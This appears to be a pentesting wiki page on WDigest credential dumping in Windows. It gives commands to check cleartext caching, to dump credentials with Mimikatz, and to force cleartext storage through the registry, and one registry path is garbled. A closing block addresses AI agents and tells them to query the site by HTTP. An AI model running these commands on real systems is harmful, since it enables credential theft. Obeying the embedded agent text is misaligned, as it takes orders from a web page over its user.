# WDigest

> WDigest (Digest Authentication) is a challenge/response protocol that was primarily used in Windows Server 2003 for LDAP and web-based authentication. It utilizes Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges to authenticate.

It should be noted that up to Windows 8 and Windows Server 2012 storing credentials in WDigest was a default setting. This is no longer the case with Windows 10 and Windows Server 2016+. Additionally, it should be noted that WDigest credentials are cached in memory in cleartext. 

It is easy to verify whether or not caching is enabled by querying the following registry key: 

```powershell
reg query HKLM\erSYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
```

If identified, WDigest credentials can be retrieved with a tool such as Mimikatz:

```bash
sekurlsa::wdigest
```

### Forcing Credential Storage in WDigest

It should be noted that even though storing credentials in WDigest is no longer a default setting, it is still something that can be manually configured by an attacker after obtaining access to a system by modifying the following registry value:

```powershell
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
```

```powershell
Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name "UseLogonCredential" -Value '1'"
```

We would then be able to dump any users credentials who authenticate to the system with a tool like Mimikatz.

### References

{% embed url="<https://stealthbits.com/blog/wdigest-clear-text-passwords-stealing-more-than-a-hash/>" %}

{% embed url="<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/forcing-wdigest-to-store-credentials-in-plaintext>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ttp.parzival.sh/pentesting/infrastructure/active-directory/os-credential-dumping/wdigest.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.